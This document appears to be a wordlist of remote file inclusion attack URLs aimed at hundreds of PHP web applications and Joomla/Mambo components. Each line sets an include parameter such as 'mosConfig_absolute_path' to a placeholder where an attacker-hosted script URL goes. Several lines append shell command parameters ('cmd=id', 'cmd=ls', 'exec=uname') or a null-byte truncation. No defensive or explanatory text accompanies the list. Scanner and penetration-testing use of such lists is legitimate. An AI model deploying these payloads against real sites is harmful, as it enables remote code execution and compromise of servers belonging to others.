||||
/admin/login.php?absolute_path=XXpathXX
|
||||
/admin/news.admin.php?path_to_script=XXpathXX?&cmd=ls
|
||||
/admin/news.php?language=XXpathXX
|
||||
/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=XXpathXX
|
||||
/admin/sendmsg.php?config[installdir]=XXpathXX
|
||||
/admin/setup/level2.php?dir=XXpathXX
|
||||
/admin/system/config/conf-activation.php?site_path=XXpathXX
|
||||
/admin/system/include.php?skindir=XXpathXX
|
||||
/admin/system/include.php?start=1&skindir=XXpathXX
|
||||
/admin/system/menu/item.php?site_path=XXpathXX
|
||||
/admin/system/modules/conf_modules.php?site_path=XXpathXX
|
||||
/admin/templates/template_thumbnail.php?thumb_template=XXpathXX
|
||||
/admin/testing/tests/0004_init_urls.php?init_path=XXpathXX?&
|
||||
/admin/themes.php?config[installdir]=XXpathXX
|
||||
/admin/tools/utf8conversion/index.php?path=XXpathXX?
|
||||
/admin/user_user.php?language=XXpathXX
|
||||
/admincp/auth/checklogin.php?cfgProgDir=XXpathXX
|
||||
/admincp/auth/secure.php?cfgProgDir=XXpathXX
|
||||
/adminhead.php?path[docroot]=XXpathXX
|
||||
/admini/admin.php?INC=XXpathXX?
|
||||
/admini/index.php?INC=XXpathXX?
|
||||
/administrator/admin.php?site_absolute_path=XXpathXX?
|
||||
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/administrator/components/com_color/admin.color.php?mosConfig_live_site=XXpathXX?
|
||||
/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=XXpathXX?
|
||||
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=XXpathXX
|
||||
/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=XXpathXX
|
||||
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=XXpathXX
|
||||
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_jreactions/langset.php?comPath=XXpathXX?
|
||||
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=XXpathXX?
|
||||
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=XXpathXX
|
||||
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=XXpathXX
|
||||
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=XXpathXX?
|
||||
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=XXpathXX
|
||||
/administrator/components/com_webring/admin.webring.docs.php?component_dir=XXpathXX?
|
||||
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=XXpathXX
|
||||
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=XXpathXX
|
||||
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=XXpathXX?
|
||||
/administrator/menu_add.php?site_absolute_path=XXpathXX?
|
||||
/administrator/menu_operation.php?site_absolute_path=XXpathXX?
|
||||
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=XXpathXX
|
||||
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=XXpathXX?
|
||||
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=XXpathXX
|
||||
/adodb/adodb-pear.inc.php?ourlinux_root_path=XXpathXX
|
||||
/adodb/adodb.inc.php?path=XXpathXX
|
||||
/advanced_comment_system/admin.php?ACS_path=XXpathXX?
|
||||
/advanced_comment_system/index.php?ACS_path=XXpathXX?
|
||||
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=XXpathXX?
|
||||
/agenda.php3?rootagenda=XXpathXX
|
||||
/agenda2.php3?rootagenda=XXpathXX
|
||||
/aides/index.php?page=XXpathXX?
|
||||
/ains_main.php?ains_path=XXpathXX
|
||||
/ajax/loadsplash.php?full_path=XXpathXX
|
||||
/ajouter.php?include=XXpathXX?
|
||||
/akarru.gui/main_content.php?bm_content=XXpathXX
|
||||
/akocomments.php?mosConfig_absolute_path=XXpathXX
|
||||
/amazon/cart.php?cmd=add&asin=XXpathXX
|
||||
/amazon/index.php?lang=XXpathXX
|
||||
/amazon/info.php?asin=XXpathXX
|
||||
/annonce.php?page=XXpathXX?&cmd=id
|
||||
/announcements.php?phpraid_dir=XXpathXX
|
||||
/anzagien.php?config[root_ordner]=XXpathXX?cmd=id
|
||||
/apbn/templates/head.php?APB_SETTINGS[template_path]=XXpathXX
|
||||
/api.php?t_path_core=XXpathXX?&cmd=id
|
||||
/apps/apps.php?app=XXpathXX
|
||||
/appserv/main.php?appserv_root=XXpathXX
|
||||
/arab3upload/customize.php?path=XXpathXX?&cmd=pwd
|
||||
/arab3upload/initialize.php?path=XXpathXX?&cmd=pwd
|
||||
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=XXpathXX
|
||||
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=XXpathXX
|
||||
/arash_lib/include/edit.inc.php?arashlib_dir=XXpathXX
|
||||
/arash_lib/include/list_features.inc.php?arashlib_dir=XXpathXX
|
||||
/archive.php?scriptpath=XXpathXX?
|
||||
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=XXpathXX%00
|
||||
/artlist.php?root_path=XXpathXX
|
||||
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=XXpathXX?cmd
|
||||
/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
|
||||
/athena.php?athena_dir=XXpathXX
|
||||
/auction/auction_common.php?phpbb_root_path=XXpathXX
|
||||
/auction/includes/converter.inc.php?include_path=XXpathXX?
|
||||
/auction/includes/messages.inc.php?include_path=XXpathXX?
|
||||
/auction/includes/settings.inc.php?include_path=XXpathXX?
|
||||
/auction/phpAdsNew/view.inc.php?phpAds_path=XXpathXX
|
||||
/auth.cookie.inc.php?da_path=XXpathXX
|
||||
/auth.header.inc.php?da_path=XXpathXX
|
||||
/auth.sessions.inc.php?da_path=XXpathXX
|
||||
/auth/auth.php?phpbb_root_path=XXpathXX
|
||||
/auth/auth_phpbb/phpbb_root_path=XXpathXX
|
||||
/authenticate.php?default_path_for_themes=XXpathXX?
|
||||
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=XXpathXX
|
||||
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=XXpathXX
|
||||
/auto_check_renewals.php?installed_config_file=XXpathXX?cmd=ls
|
||||
/autoindex.php?cfg_file=XXpathXX?
|
||||
/awzmb/adminhelp.php?Setting[OPT_includepath]=XXpathXX
|
||||
/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=XXpathXX
|
||||
/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=XXpathXX
|
||||
/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=XXpathXX
|
||||
/awzmb/modules/help.incl.php?Setting[OPT_includepath]=XXpathXX
|
||||
/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=XXpathXX
|
||||
/axoverzicht.cgi?maand=XXpathXX
|
||||
/b2-tools/gm-2-b2.php?b2inc=XXpathXX
|
||||
/b2verifauth.php?index=XXpathXX?
|
||||
/backend/addons/links/index.php?PATH=XXpathXX
|
||||
/basebuilder/src/main.inc.php?mj_config[src_path]=XXpathXX???
|
||||
/bb_admin.php?includeFooter=XXpathXX
|
||||
/beacon/language/1/splash.lang.php?languagePath=XXpathXX
|
||||
/beacon/language/1/splash.lang.php?languagePath=XXpathXX?
|
||||
/belegungsplan/jahresuebersicht.inc.php?root=XXpathXX
|
||||
/belegungsplan/monatsuebersicht.inc.php?root=XXpathXX
|
||||
/belegungsplan/tagesuebersicht.inc.php?root=XXpathXX
|
||||
/belegungsplan/wochenuebersicht.inc.php?root=XXpathXX
|
||||
/bemarket/postscript/postscript.php?p_mode=XXpathXX
|
||||
/biblioteca/bib_form.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/bib_pldetails.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/bib_plform.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/bib_plsearchc.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/bib_plsearchs.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/bib_save.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/bib_searchc.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/bib_searchs.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/edi_form.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/edi_save.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/gen_form.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/gen_save.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/lin_form.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/lin_save.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/luo_form.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/luo_save.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/sog_form.php?CLASSPATH=XXpathXX
|
||||
/biblioteca/sog_save.php?CLASSPATH=XXpathXX
|
||||
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX
|
||||
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
|
||||
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
|
||||
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
|
||||
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX?
|
||||
/bild.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/bin/qte_init.php?qte_root=XXpathXX?
|
||||
/bingoserver.php3?response_dir=XXpathXX
|
||||
/block.php?Include=XXpathXX
|
||||
/blocks/birthday.php?full_path=XXpathXX
|
||||
/blocks/events.php?full_path=XXpathXX
|
||||
/blocks/help.php?full_path=XXpathXX
|
||||
/blogcms/admin/media.php?DIR_LIBS=XXpathXX?
|
||||
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=XXpathXX?
|
||||
/blogcms/index.php?DIR_PLUGINS=XXpathXX?
|
||||
/board/post.php?qb_path=XXpathXX
|
||||
/boitenews4/index.php?url_index=XXpathXX?
|
||||
/books/allbooks.php?home=XXpathXX
|
||||
/books/home.php?home=XXpathXX
|
||||
/books/mybooks.php?home=XXpathXX
|
||||
/bp_ncom.php?bnrep=XXpathXX
|
||||
/bp_ncom.php?bnrep=XXpathXX?
|
||||
/bp_news.php?bnrep=XXpathXX
|
||||
/bridge/enigma/E2_header.inc.php?boarddir=XXpathXX?
|
||||
/bridge/yabbse.inc.php?sourcedir=XXpathXX
|
||||
/bridges/SMF/logout.php?path_to_smf=XXpathXX
|
||||
/bu/bu_cache.php?bu_dir=XXpathXX?
|
||||
/bu/bu_claro.php?bu_dir=XXpathXX?
|
||||
/bu/bu_parse.php?bu_dir=XXpathXX?
|
||||
/bu/process.php?bu_dir=XXpathXX?
|
||||
/buddy.php?CONFIG[MWCHAT_Libs]=XXpathXX?
|
||||
/builddb.php?env_dir=XXpathXX
|
||||
/button/settings_sql.php?path=XXpathXX
|
||||
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=XXpathXX?
|
||||
/cal.func.php?dir_edge_lang=XXpathXX
|
||||
/calcul-page.php?home=XXpathXX
|
||||
/calendar.php?cfg_dir=XXpathXX?
|
||||
/calendar.php?lang=XXpathXX
|
||||
/calendar.php?path_to_calendar=XXpathXX
|
||||
/calendar.php?vwar_root=XXpathXX?
|
||||
/calendar/demo/index.php?date=&v=XXpathXX?
|
||||
/calendar/payment.php?insPath=XXpathXX
|
||||
/calendario/cal_insert.php?CLASSPATH=XXpathXX
|
||||
/calendario/cal_save.php?CLASSPATH=XXpathXX
|
||||
/calendario/cal_saveactivity.php?CLASSPATH=XXpathXX
|
||||
/cart.php?lang_list=XXpathXX
|
||||
/cart_content.php?cart_isp_root=XXpathXX
|
||||
/catalogg/inludes/include_once.php?include_file=XXpathXX
|
||||
/catalogshop.php?mosConfig_absolute_path=XXpathXX
|
||||
/cdsagenda/modification/SendAlertEmail.php?AGE=XXpathXX?
|
||||
/cfagcms/themes/default/index.php?main=XXpathXX
|
||||
/ch_readalso.php?read_xml_include=XXpathXX
|
||||
/challenge.php?vwar_root=XXpathXX
|
||||
/change_preferences2.php?target=XXpathXX?
|
||||
/chat.php?CONFIG[MWCHAT_Libs]=XXpathXX?
|
||||
/chat.php?my[root]=XXpathXX?cm=id
|
||||
/chat/adminips.php?banned_file=XXpathXX
|
||||
/chat/users_popupL.php3?From=XXpathXX
|
||||
/checkout.php?abs_path=XXpathXX
|
||||
/checkout.php?abs_path=XXpathXX?
|
||||
/ciamos_path/modules/forum/include/config.php?module_cache_path='XXpathXX'
|
||||
/circ.php?include_path=XXpathXX?
|
||||
/circolari/cir_save.php?CLASSPATH=XXpathXX
|
||||
/citywriter/head.php?path=XXpathXX?
|
||||
/cl_files/index.php?path_to_calendar=XXpathXX?
|
||||
/claroline/auth/ldap/authldap.php?includePath=XXpathXX
|
||||
/claroline/phpbb/page_tail.php?includePath=XXpathXX
|
||||
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=XXpathXX?
|
||||
/class.mysql.php?path_to_bt_dir=XXpathXX
|
||||
/class/Wiki/Wiki.php?c_node[class_path]=XXpathXX
|
||||
/class/jpcache/jpcache.php?_PSL[classdir]=XXpathXX?exec=uname
|
||||
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=XXpathXX
|
||||
/classes/Cache.class.php?rootdir=XXpathXX?
|
||||
/classes/Customer.class.php?rootdir=XXpathXX?
|
||||
/classes/Performance.class.php?rootdir=XXpathXX?
|
||||
/classes/Project.class.php?rootdir=XXpathXX?
|
||||
/classes/Representative.class.php?rootdir=XXpathXX?
|
||||
/classes/User.class.php?rootdir=XXpathXX?
|
||||
/classes/admin_o.php?absolutepath=XXpathXX
|
||||
/classes/adodbt/sql.php?classes_dir=XXpathXX
|
||||
/classes/adodbt/sql.php?classes_dir=XXpathXX?
|
||||
/classes/board_o.php?absolutepath=XXpathXX
|
||||
/classes/class_admin.php?PathToComment=XXpathXX?
|
||||
/classes/class_comments.php?PathToComment=XXpathXX?
|
||||
/classes/class_mail.inc.php?path_to_folder=XXpathXX
|
||||
/classes/common.php?rootdir=XXpathXX?
|
||||
/classes/core/language.php?rootdir=XXpathXX
|
||||
/classes/dev_o.php?absolutepath=XXpathXX
|
||||
/classes/file_o.php?absolutepath=XXpathXX
|
||||
/classes/html/com_articles.php?absolute_path=XXpathXX
|
||||
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
|
||||
/classes/query.class.php?baseDir=XXpathXX
|
||||
/classes/tech_o.php?absolutepath=XXpathXX
|
||||
/classified.php?insPath=XXpathXX
|
||||
/classified_right.php?language_dir=XXpathXX
|
||||
/classifieds/index.php?lowerTemplate=XXpathXX
|
||||
/clear.php?bibtexrootrel=XXpathXX?
|
||||
/clearinfo.php?bibtexrootrel=XXpathXX?
|
||||
/click.php?dir=XXpathXX?
|
||||
/client.php?dir=XXpathXX
|
||||
/client/faq_1/PageController.php?dir=XXpathXX
|
||||
/clients/index.php?src=XXpathXX
|
||||
/cls_fast_template.php?fname=XXpathXX
|
||||
/cm68news/engine/oldnews.inc.php?addpath=XXpathXX?&
|
||||
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=XXpathXX?
|
||||
/cms/meetweb/classes/ManagerResource.class.php?root_path=XXpathXX
|
||||
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=XXpathXX
|
||||
/cms/meetweb/classes/RegForm.class.php?root_path=XXpathXX
|
||||
/cms/meetweb/classes/RegResource.class.php?root_path=XXpathXX
|
||||
/cms/meetweb/classes/RegRightsResource.class.php?root_path=XXpathXX
|
||||
/cms/meetweb/classes/modules.php?root_path=XXpathXX
|
||||
/cms/modules/form.lib.php?sourceFolder=XXpathXX?
|
||||
/cms/system/openengine.php?oe_classpath=XXpathXX???
|
||||
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=XXpathXX?
|
||||
/cn_config.php?tpath=XXpathXX?
|
||||
/coast/header.php?sections_file=XXpathXX?
|
||||
/code/berylium-classes.php?beryliumroot=XXpathXX?
|
||||
/code/display.php?admindir=XXpathXX?
|
||||
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=XXpathXX
|
||||
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
|
||||
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=XXpathXX?
|
||||
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
|
||||
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
|
||||
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
|
||||
/comments.php?AMG_serverpath=XXpathXX
|
||||
/comments.php?scriptpath=XXpathXX?
|
||||
/common.inc.php?CFG[libdir]=XXpathXX
|
||||
/common.inc.php?CFG[libdir]=XXpathXX?
|
||||
/common.inc.php?base_path=XXpathXX
|
||||
/common.php?db_file=XXpathXX
|
||||
/common.php?dir=XXpathXX
|
||||
/common.php?ezt_root_path=XXpathXX?
|
||||
/common.php?include_path=XXpathXX
|
||||
/common.php?livealbum_dir=XXpathXX?
|
||||
/common.php?locale=XXpathXX
|
||||
/common.php?phpht_real_path=XXpathXX?
|
||||
/common/db.php?commonpath=XXpathXX?
|
||||
/common/func.php?CommonAbsD=XXpathXX?
|
||||
/common/func.php?CommonAbsDir=XXpathXX
|
||||
/community/Offline.php?sourcedir=XXpathXX?
|
||||
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=XXpathXX
|
||||
/components/calendar/com_calendar.php?absolute_path=XXpathXX?
|
||||
/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
|
||||
/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_articles.php?absolute_path=XXpathXX?
|
||||
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_calendar.php?absolute_path=XXpathXX?
|
||||
/components/com_cpg/cpg.php?mosConfig_absolute_path=XXpathXX?
|
||||
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=XXpathXX
|
||||
/components/com_facileforms/facileforms.frame.php?ff_compath=XXpathXX
|
||||
/components/com_forum/download.php?phpbb_root_path=XXpathXX
|
||||
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_guestbook.php?absolute_path=XXpathXX?
|
||||
/components/com_hashcash/server.php?mosConfig_absolute_path=XXpathXX?
|
||||
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_joomlaboard/file_upload.php?sbp=XXpathXX?
|
||||
/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=XXpathXX?
|
||||
/components/com_lm/archive.php?mosConfig_absolute_path=XXpathXX?
|
||||
/components/com_mambowiki/MamboLogin.php?IP=XXpathXX?
|
||||
/components/com_minibb.php?absolute_path=XXpathXX
|
||||
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_mospray/scripts/admin.php?basedir=XXpathXX?&cmd=id
|
||||
/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=XXpathXX
|
||||
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=XXpathXX
|
||||
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
|
||||
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=XXpathXX?
|
||||
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=XXpathXX?
|
||||
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=XXpathXX
|
||||
/components/com_smf/smf.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=XXpathXX
|
||||
/components/core/connect.php?language_path=XXpathXX
|
||||
/components/minibb/bb_plugins.php?absolute_path=XXpathXX?
|
||||
/components/minibb/index.php?absolute_path=XXpathXX?
|
||||
/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
|
||||
/compteur/mapage.php?chemin=XXpathXX
|
||||
/conf.php?securelib=XXpathXX
|
||||
/conf.php?securelib=XXpathXX?
|
||||
/config.inc.php3?rel_path=XXpathXX
|
||||
/config.inc.php?_path=XXpathXX
|
||||
/config.inc.php?path_escape=XXpathXX
|
||||
/config.inc.php?path_escape=XXpathXX%00
|
||||
/config.php?full_path=XXpathXX?
|
||||
/config.php?full_path_to_db=XXpathXX
|
||||
/config.php?fullpath=XXpathXX
|
||||
/config.php?incpath=XXpathXX
|
||||
/config.php?path_to_root=XXpathXX
|
||||
/config.php?rel_path=XXpathXX?
|
||||
